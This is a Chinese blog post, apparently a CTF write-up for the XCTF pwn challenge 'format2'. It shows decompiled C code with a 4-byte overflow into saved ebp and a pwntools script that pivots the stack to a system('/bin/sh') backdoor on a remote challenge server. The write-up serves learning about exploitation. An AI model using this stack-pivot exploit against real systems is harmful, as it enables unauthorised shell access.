[XCTF-pwn] 22_format2

最新推荐文章于 2022-11-23 15:55:43 发布
最新推荐文章于 2022-11-23 15:55:43 发布
阅读量233 收藏 1
点赞数 1
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123344576
版权
本文详细介绍了栈溢出的概念,通过一个C程序实例展示了如何利用溢出进行内存操作。程序中,输入数据经过Base64解码后可能导致长度超过限制,从而覆盖ebp并引发移栈到特定地址,执行shell命令。作者提供了exploit代码来演示这个过程,强调了安全编程的重要性。
摘要由CSDN通过智能技术生成

移栈

一个移栈的小题,1:没开pie而且输入的内容放在bss中地址已知,2:程序的correct给了后门,虽然不能直接运行到但可以当后门用,3:auth函数将解码后的input复制到v4,而v4定义是ebp-8当输入大于8里就会溢出到ebp

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+18h] [ebp-28h] BYREF
  char s[30]; // [esp+1Eh] [ebp-22h] BYREF
  unsigned int v6; // [esp+3Ch] [ebp-4h]

  memset(s, 0, sizeof(s));
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  printf("Authenticate : ");
  _isoc99_scanf("%30s", s);
  memset(&input, 0, 0xCu);
  v4 = 0;
  v6 = Base64Decode((int)s, &v4);               // 输入数据base64解码
  if ( v6 > 0xC )
  {
    puts("Wrong Length");
  }
  else
  {
    memcpy(&input, v4, v6);
    if ( auth(v6) )
      correct();
  }
  return 0;
}
void __noreturn correct()
{
  if ( input == -559038737 )
  {
    puts("Congratulation! you are good!");
    system("/bin/sh");
  }
  exit(0);
}
_BOOL4 __cdecl auth(int a1)
{
  char v2[8]; // [esp+14h] [ebp-14h] BYREF
  char *s2; // [esp+1Ch] [ebp-Ch]
  int v4; // [esp+20h] [ebp-8h] BYREF

  memcpy(&v4, &input, a1);                      // 将input复制到v4,input最长12,可覆盖到ebp进行移栈
  s2 = (char *)calc_md5((int)v2, 12);
  printf("hash : %s\n", s2);
  return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}

题目本身没有难度,像教学例题一样把溢出,移栈都交代明白了。输入的数据解码后放到input_addr,然后调用auth里将这12字节复制到v4,其中最后4位溢出覆盖到ebp,返回时发生移栈到input_addr再从p32(system_addr)开始执行。

from pwn import *
from base64 import b64encode

p = remote('111.200.241.244', 58100)

system_addr = 0x8049284
input_addr  = 0x811eb40
# 覆盖ebp移栈到input_addr
payload = b'AAAA'+ p32(system_addr) + p32(input_addr) #auth() len(input)=12 v4=ebp-8  -> ebp=input_addr

p.sendline(b64encode(payload))

p.interactive()

石氏是时试
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
format2(xctf)
weixin_43868725的博客
09-02 708
0x0 程序保护和流程 保护: 流程: main() 接收一个最长为30的字符串,通过base64解密后长度小于12就会将解密后的字符串复制到input处,之后调用auth()。 在将input中的字符串复制到v4的时候存在四个字节的溢出。如果返回值为1的话就会进入correct()。 此时如果input==0xDEADBEEF的话就能够getshell了。 0x1 利用过程 1.虽然checksec提示说程序开启了canary但是在主要逻辑上的函数都没有开启canary,所以可以进行溢出。 2.因
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 4020
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
xctf format2
doudoudedi
10-01 315
日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目 我们直接看main函数 把输入的base64解密长度不能超过12 目的是correct函数 发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ; pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦...
攻防世界PWNformat2题解
seaaseesa的博客
11-10 701
format2(整数地址空间溢出) 本题需要细心 首先,检测一下程序保护机制 虽然说开启了CANARY,但是关键的几个函数没有开启这个机制,这道题因为libc库静态链接到文件里,所以才造成这种干扰。 我们用IDA分析一下 后门函数 溢出点在这,memcpy传入的是v4的地址,而v4是int,最多也就8字节,因此这里可以溢出 程序的流程是将我们输入的字符串进行BASE6...
攻防世界-PWN-Format2解题过程
aptx4869_li的博客
07-24 429
# 解题思路 ## 安全机制检查 ``` healer@kali:~/Desktop/format1$ readelf -h format1 ELF Header: Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian ...
2021梦极光CTF Pwn
最新发布
qq_61793472的博客
11-23 554
pwn
攻防世界pwn-Mary_Morton
qq_41168609的博客
01-04 275
题目 1、文件分析 64位的程序,并且开启了NX和Canary,还有Partial RELRO,got表有写权限 执行文件看流程 使用IDA进行分析,发现存在两处漏洞,字符串漏洞和栈溢出漏洞 通过搜索,存在后门函数 2、解题思路: 首先利用字符串漏洞,获取canary的值,绕过Canary保护 利用栈溢出漏洞,执行后门函数,获取到flag 3、获取canary值 计算偏移地址 canary的值就是var_8,我们需要获取var_8的值,栈溢出时保证该值不改变就可以绕过canary保护。 (1
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 416
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
time_formatter(xctf)
weixin_43868725的博客
08-08 346
0x0 程序保护和流程 保护: 流程: main() 选择1可以设置时间格式,选择2可以设置时间,选择3可以设置时区,选择4可以打印时间,选择5可以退出程序。 可以看到再选择4的时候使用了snprintf函数构造了一个命令字符串,然后再交由system函数执行相应的命令。 ptr在选择1中被赋值。 并且ptr所指向的内存空间中的字符串不能含有除**%aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^#** 之外的字符。 最后进入选择5。 发现程序在退出
pwn 练习笔记 format2
SsMing的博客
08-16 320
例子是protostar format2 源码为: 和昨天的思路一样,确定要通过格式化字符串洞覆盖target的内容,题目的目的是要让target等于64 1.找到target的地址 2.计算偏移量 先起手个200个 我们发现第四个就是我们的ABCD,所以改一下payload 然后要是target的值为64 ,在括号之前要有64个字符,这里前面已经有34个,还差30个...
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4289
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
format2 攻防世界
qq_41071646的博客
07-15 685
这个题 确实很恶心 本来感觉应该是栈溢出 或者 直接验证 但是 md5 解不开 然后调试的时候逐渐发现问题 晕死,, 虽然长度那个变量是 无符号 但是 输入字符限定 30 我们也没有什么办法 来通过 这个来操作 然后进入check 函数 发现v4 可以 溢出修改ebp 并且这里有后门函数 ebp ebp ebp 栈转移 两个 leave ...
BUUCTF-网鼎杯2020-青龙组-joker
qq_51600802的博客
10-28 492
一.程序分析 首先还是将程序进行查壳 IDA打开后尝试f5,发现因为堆栈不平衡,无法直接反编译,所以修改一下 选项->常规->反汇编 勾选堆栈指针,快捷键alt+k,将SP修改为零,如果下面还遇到同理 二.伪代码分析 int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp+12h] [ebp-96h] char v5; // [esp+4...
BUUCTF pwn wp 86 - 90
fa1c4的blog
01-17 643
mrctf2020_shellcode_revenge 一道经典题目, 可见字符shellcode. F5失败直接读汇编 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near buf= byte ptr -410h var_8= dword ptr -8 var_4= dword ptr -4 ; __unwi
[BMZCTF20220101-reverse] checkin
weixin_52640415的博客
01-01 751
有了第一题的经验就可以开始自己处理第2题了 这个不用处理就能反编译。 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[2]; // [esp+1Ah] [ebp-16Eh] BYREF _BYTE v5[34]; // [esp+1Ch] [ebp-16Ch] BYREF int v6; // [esp+3Eh] [ebp-14Ah] char Str[50]; // [esp+42h
pwnable.kr之simple login
Jason_ZhouYetao的博客
07-14 626
这题与之前所作的题目不同,不同点在于这题不存在ssh连接至其他的服务器,需要自己在脚本中体现。 首先,下载文件,放到IDA里跑一跑(这里说明,要注意下载下来的文件是32位还是64位的文件,这关系到能不能正确打开并得到反汇编代码的问题),得到main函数的伪代码: int __cdecl main(int argc, const char **argv, const char **envp) ...
CTF中的常见python库(base64、Pillow、requests、pwn
热门推荐
Love&Share
06-01 1万+
内建模块 base64 Base64是一种任意二进制到文本字符串的编码方法,常用于在URL、Cookie、网页中传输少量二进制数据。 >>> import base64#导入 >>> base64.b64encode(b'library')#编码,b代表bytes b'bGlicmFyeQ=='#base64最多有两个等号 >>> base64.b64decode('bGlicmFyeQ==')#解码 b'library' >>> ba
pwn刷题num24----ret2libc + 栈平衡
tbsqigongzi的博客
04-26 1213
BUUCTF-PWN-ciscn_2019_c_1 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,有三个选择, 欢迎来到这台加密机 1.加密 2.解密 3.退出 选加密1写入三个aaa,被加密成lll,选解密2,出了一句我认为你能自己解密。。。 ida看一
pwnable.kr之simple login详解
Bill
04-26 2127
学习二进制不容易,大家要忍得住寂寞,耐得住孤独,进入正题. 总体思路: 输入更多的数据,溢出,修改main的返回值地址,使其返回到correct中,从而获取shell. 大家可能会有疑问:为什么不修改auth函数的返回值地址,跳到correct中.这是因为长度不够,我们需要输入16个字节的长度,才能覆盖返回值地址,但是程序只给了我们12个字节的长度. main函数int main(int
XCTF移动应用逆向分析:解密安卓app2
作者提供了一个名为XCTF-mobile app2的安卓应用作为示例,用于教学如何进行逆向分析并找到隐藏的flag。" 在安卓逆向工程中,首要步骤是获取应用程序的内部数据。在这个案例中,首先需要将APK安装包的后缀更改为.zip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值